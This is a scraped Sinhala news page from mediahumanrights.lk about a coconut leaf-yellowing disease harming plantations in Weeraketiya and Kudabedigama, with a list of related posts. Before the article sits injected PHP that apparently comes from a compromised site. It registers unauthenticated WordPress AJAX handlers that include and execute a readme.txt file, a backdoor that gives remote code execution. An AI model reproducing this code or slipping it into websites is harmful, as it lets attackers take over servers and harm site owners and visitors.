if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පොල් වගාව අර්බුදයක - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

පොල් වගාව අර්බුදයක

රෝගයක් හේතුවෙන් වීරකැටිය, කුඩාබැදිගම ප්‍රදේශයේ පොල් වගාව අර්බුදයකට ලක්ව තිබේ.
පොල් වගාකරුවන් පෙන්වා දෙන්නේ ප්‍රදේශයේ පොල් වගාව ආශ්‍රිතව  පොල් අතු කහ ගැන්වීමේ රෝගී තත්ත්වයක් හටගෙන ඇති බවයි.
ප්‍රදේශයේ අක්කර 250ත් 300ත් අතර ප්‍රදේශයක මෙම රෝග තත්ත්වය ව්‍යාප්ත වී ඇති බව සඳහන්ය.
මාස 6ක පමණ කාලයක සිට පවතින  මෙම රෝග තත්ත්වය හේතුවෙන් පොල් ඵලදාව ශිඝ්‍ර ලෙස අඩු වී ඇති බව පොල් වගාකරුවන් පෙන්වා දෙයි.
තමන් මුහුණ දී සිටින ගැටළුව සම්බන්ධයෙන් වීරකැටිය, කුඩාබැදිගම ප්‍රදේශයේ පොල් වගාකකරුවන් පිරිසක් මෙලෙස අදහස් පළ කළේය.
(under the courtesy of adaderana news web)

Related posts

සුළඟින් නිවාස 29ට හානි

Shiran Viraj

ගතවූ පැය 24 වැඩිම ආසාදිතයින් කොළඹින් : බන්ධනාගාර පොකුරත් 500 ඉක්මවයි

Shiran Viraj

ගීතාගේ පෙත්සම විභාගයට පංච පුද්ගල විනිසුරු මඩුල්ලක්

Shiran Viraj